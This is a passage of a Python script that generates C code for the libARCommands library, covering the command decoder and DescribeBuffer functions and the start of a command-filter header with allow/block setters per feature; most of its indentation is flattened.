cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
for ftr in allFeatures:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ':\n')
cfile.write (' {\n')
    if ftr.classes: # project only
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for cl in ftr.classes:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ':\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in cl.cmds:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
CBNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Cb')
CBCUSTOMNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Custom')
DECODER_CBNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Callback'
DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Custom'
cfile.write (' if (decoder) {\n')
cfile.write (' ARSAL_Mutex_Lock (&decoder->mutex);\n')
cfile.write (' } else {\n')
cfile.write (' ARSAL_Mutex_Lock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' }\n')
cfile.write (' if ((decoder && decoder->' + DECODER_CBNAME + ') || (!decoder && ' + CBNAME + '))\n')
cfile.write (' {\n')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (' ' + xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ' = NULL;\n')
else:
cfile.write (' ' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ';\n')
if cmd.args:
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize (cmd.name) + 'DecodeArgs') + '(buffer, buffLen, &offset')
for arg in cmd.args:
cfile.write (', &_' + arg.name)
cfile.write (');\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' if (decoder && decoder->' + DECODER_CBNAME + ') {\n')
cfile.write (' decoder->' + DECODER_CBNAME + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
if isinstance(arg.argType, ArMultiSetting):
cfile.write ('&_' + arg.name)
else:
cfile.write ('_' + arg.name)
if not first:
cfile.write (', ')
cfile.write ('decoder->' + DECODER_CBCUSTOMNAME + ');\n')
cfile.write (' } else {\n')
cfile.write (' ' + CBNAME + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
if isinstance(arg.argType, ArMultiSetting):
cfile.write ('&_' + arg.name)
else:
cfile.write ('_' + arg.name)
if not first:
cfile.write (', ')
cfile.write (CBCUSTOMNAME + ');\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NO_CALLBACK') + ';\n')
cfile.write (' }\n')
cfile.write (' if (decoder) {\n')
cfile.write (' ARSAL_Mutex_Unlock (&decoder->mutex);\n')
cfile.write (' } else {\n')
cfile.write (' ARSAL_Mutex_Unlock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
else:
cfile.write (' if (commandClass == ' + ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
CBNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Cb')
CBCUSTOMNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Custom')
DECODER_CBNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Callback'
DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Custom'
cfile.write (' if (decoder) {\n')
cfile.write (' ARSAL_Mutex_Lock (&decoder->mutex);\n')
cfile.write (' } else {\n')
cfile.write (' ARSAL_Mutex_Lock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' }\n')
cfile.write (' if ((decoder && decoder->' + DECODER_CBNAME + ') || (!decoder && ' + CBNAME + '))\n')
cfile.write (' {\n')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (' ' + xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ' = NULL;\n')
else:
cfile.write (' ' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ';\n')
if cmd.args:
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DecodeArgs') + '(buffer, buffLen, &offset')
for arg in cmd.args:
cfile.write (', &_' + arg.name)
cfile.write (');\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' if (decoder && decoder->' + DECODER_CBNAME + ') {\n')
cfile.write (' decoder->' + DECODER_CBNAME + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
if isinstance(arg.argType, ArMultiSetting):
cfile.write ('&_' + arg.name)
else:
cfile.write ('_' + arg.name)
if not first:
cfile.write (', ')
cfile.write ('decoder->' + DECODER_CBCUSTOMNAME + ');\n')
cfile.write (' } else {\n')
cfile.write (' ' + CBNAME + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
if isinstance(arg.argType, ArMultiSetting):
cfile.write ('&_' + arg.name)
else:
cfile.write ('_' + arg.name)
if not first:
cfile.write (', ')
cfile.write (CBCUSTOMNAME + ');\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NO_CALLBACK') + ';\n')
cfile.write (' }\n')
cfile.write (' if (decoder) {\n')
cfile.write (' ARSAL_Mutex_Unlock (&decoder->mutex);\n')
cfile.write (' } else {\n')
cfile.write (' ARSAL_Mutex_Unlock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' }\n')
cfile.write (' }\n')
            cfile.write ('                    break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ' */\n')
cfile.write (' default:\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
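# DescribeBuffer() follows the same feature/class/command id walk as
# DecodeCommand(), but instead of invoking callbacks it fills resString with a
# textual description through the per-command DescribeArgs helpers.
# Illustrative shape of the produced string (hypothetical names and values):
#   "feature.class.command: | firstArg -> 42 | secondArg -> foo"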
cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' (uint8_t *buffer, int32_t buffLen, char *resString, int32_t stringLen)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, ID_SUBMODULE, 'FEATURE') + ' commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' int32_t offset = 0;\n')
cfile.write (' int32_t error = 0;\n')
cfile.write (' int strOffset = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' if ((NULL == buffer) || (NULL == resString))\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' if (' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' () == 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> keep retVal to OK if init went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' && stringLen > 0)\n')
cfile.write (' {\n')
cfile.write (' resString[0] = \'\\0\';\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
for ftr in allFeatures:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ':\n')
cfile.write (' {\n')
if ftr.classes: #project only
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for cl in ftr.classes:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ':\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in cl.cmds:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.' + cl.name + '.' + cmd.name + ':", resString, stringLen, strOffset) ;\n')
if cmd.args:
cfile.write (' if (strOffset > 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + '(buffer, buffLen, &offset, resString, stringLen, &strOffset);\n')
cfile.write (' } // No else --> If first print failed, the next if will set the error code\n')
cfile.write ('\n')
cfile.write (' if (strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
                    cfile.write ('                        } // No else --> Do not modify retVal if no error occurred\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.' + cl.name + '.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
else:
cfile.write (' if (commandClass == ' + ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.' + cmd.name + ':", resString, stringLen, strOffset) ;\n')
if cmd.args:
cfile.write (' if (strOffset > 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + '(buffer, buffLen, &offset, resString, stringLen, &strOffset);\n')
cfile.write (' } // No else --> If first print failed, the next if will set the error code\n')
cfile.write ('\n')
cfile.write (' if (strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
                cfile.write ('                    } // No else --> Do not modify retVal if no error occurred\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) +'.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ' */\n')
cfile.write (' default:\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('// END GENERATED CODE\n')
cfile.close ()
#################################
# 9TH PART : #
#################################
# Generate filter h file #
#################################
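# The generated header declares: the filter error enum (OK/ALLOC/BAD_STATUS/
# BAD_FILTER/BAD_BUFFER/OTHER), the filter status enum (ALLOWED/BLOCKED/
# UNKNOWN/ERROR), the opaque ARCOMMANDS_Filter_t handle with its NewFilter/
# DeleteFilter/FilterCommand functions, and one Set...Behavior setter per
# feature, per class (projects only) and per command, e.g. (shape only):
#   <FIL_ERROR_ENAME> ARCOMMANDS_Filter_Set<Feature><Cmd>Behavior
#       (ARCOMMANDS_Filter_t *filter, <FIL_STATUS_ENAME> behavior);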
hfile = open (paths.COMMANDSFIL_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/**\n')
hfile.write (' * @file ' + COMMANDSFIL_HFILE_NAME + '\n')
hfile.write (' * @brief libARCommands filter header.\n')
hfile.write (' * This file contains all declarations needed to create and use a commands filter\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef ' + COMMANDSFIL_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSFIL_DEFINE + '\n')
hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Error code for ARCOMMANDS_Filter functions.\n')
hfile.write (' */\n')
hfile.write ('typedef enum {\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ' = 0, ///< No error.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'ALLOC') + ', ///< Memory allocation error.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ', ///< The given status is not a valid status.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ', ///< The given filter is not a valid filter.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ', ///< The given buffer is not a valid buffer.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OTHER') + ', ///< Any other error.\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Status code for ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' function\n')
hfile.write (' */\n')
hfile.write ('typedef enum {\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ' = 0, ///< The command should pass the filter\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', ///< The command should not pass the filter\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'UNKNOWN') + ', ///< Unknown command. The command was possibly added in a newer version of libARCommands, or is an invalid command.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ERROR') + ', ///< The filtering of the command failed.\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief ARCOMMANDS_Filter object holder\n')
hfile.write (' */\n')
hfile.write ('typedef struct ARCOMMANDS_Filter_t ARCOMMANDS_Filter_t;\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Creates a new ARCOMMANDS_Filter_t\n')
hfile.write (' * @param defaultBehavior The default behavior of the filter (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @param error Optional pointer which will hold the error code.\n')
hfile.write (' * @warning This function allocates memory.\n')
hfile.write (' * @note The memory must be freed by a call to ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + '.\n')
hfile.write (' * @return A new ARCOMMANDS_Filter_t instance. NULL in case of error.\n')
hfile.write (' */\n')
hfile.write ('ARCOMMANDS_Filter_t* ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' defaultBehavior, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Deletes an ARCOMMANDS_Filter_t\n')
hfile.write (' * @param filter The filter to delete.\n')
hfile.write (' */\n')
hfile.write ('void ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (ARCOMMANDS_Filter_t **filter);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Filter an ARCommand\n')
hfile.write (' * @param filter The ARCOMMANDS_Filter_t to use for filtering.\n')
hfile.write (' * @param buffer The ARCommand buffer.\n')
hfile.write (' * @param len The ARCommand buffer length.\n')
hfile.write (' * @param error Optional pointer which will hold the error code.\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' status code\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (ARCOMMANDS_Filter_t *filter, uint8_t *buffer, uint32_t len, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error);\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('// Filter ON/OFF functions')
hfile.write ('\n')
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Sets the filter behavior for all commands ' + get_ftr_old_name(ftr) + '.XXX.XXX.\n')
hfile.write (' * @param filter The filter to be modified.\n')
hfile.write (' * @param behavior The behavior to use for the commands (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n')
hfile.write ('\n')
if ftr.classes: #project only
for cl in ftr.classes:
hfile.write ('// Command class ' + cl.name + '\n')
hfile.write ('\n')
hfile.write ('/**\n')
